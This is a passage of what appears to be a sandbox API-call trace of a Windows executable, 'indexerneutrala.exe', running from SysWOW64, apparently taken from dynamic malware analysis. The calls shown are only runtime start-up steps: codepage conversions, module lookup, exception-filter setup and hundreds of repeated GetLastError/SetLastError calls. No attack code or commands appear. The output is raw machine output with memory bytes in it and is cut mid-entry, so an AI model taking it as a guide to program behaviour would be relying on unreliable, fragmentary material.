lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1316 [0252.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1316, lpMultiByteStr=0xb1fd982ac0, cbMultiByte=1316, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1316 [0252.242] FreeEnvironmentStringsW (penv=0xb1fd982070) returned 1 [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] GetACP () returned 0x4e4 [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] IsValidCodePage (CodePage=0x4e4) returned 1 [0252.242] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xb1fd92f830 | out: lpCPInfo=0xb1fd92f830) returned 1 [0252.242] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xb1fd92f2d0 | out: lpCPInfo=0xb1fd92f2d0) returned 1 [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0xb1fd92efd0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ祮훲") returned 256 [0252.242] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ祮훲", cchSrc=256, lpCharType=0xb1fd92f5f0 | out: lpCharType=0xb1fd92f5f0) returned 1 [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0xb1fd92efc0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0252.242] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0252.242] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xb1fd92edb0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0252.242] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0xb1fd92f3f0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿö", lpUsedDefaultChar=0x0) returned 256 [0252.242] GetLastError () returned 0x7f [0252.242] SetLastError (dwErrCode=0x7f) [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0252.242] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb1fd92f2f0, cbMultiByte=256, lpWideCharStr=0xb1fd92efc0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0252.242] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0252.242] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xb1fd92edb0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0252.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0xb1fd92f4f0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0252.243] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14001f1d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutrala.exe" (normalized: "c:\\windows\\syswow64\\indexerneutrala.exe")) returned 0x27 [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.243] SetLastError (dwErrCode=0x0) [0252.243] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.244] SetLastError (dwErrCode=0x0) [0252.244] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.245] SetLastError (dwErrCode=0x0) [0252.245] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.246] SetLastError (dwErrCode=0x0) [0252.246] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.247] GetLastError () returned 0x0 [0252.247] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.248] GetLastError () returned 0x0 [0252.248] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.249] SetLastError (dwErrCode=0x0) [0252.249] GetLastError () returned 0x0 [0252.250] SetLastError (dwErrCode=0x0) [0252.250] GetLastError () returned 0x0 [0252.250] SetLastError (dwErrCode=0x0) [0252.250] GetLastError () returned 0x0 [0252.250] SetLastError (dwErrCode=0x0) [0252.250] GetLastError () returned 0x0 [0252.250] SetLastError (dwErrCode=0x0) [0252.250] GetLastError () returned 0x0 [0252.250] SetLastError (dwErrCode=0x0) [0252.251] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140007c50) returned 0x0 [0252.251] GetLastError () returned 0x0 [0252.251] SetLastError (dwErrCode=0x0) [0252.251] GetLastError () returned 0x0 [0252.251] SetLastError (dwErrCode=0x0) [0252.251] GetLastError () returned 0x0 [0252.251] SetLastError (dwErrCode=0x0) [0252.251] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.252] SetLastError (dwErrCode=0x0) [0252.252] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError 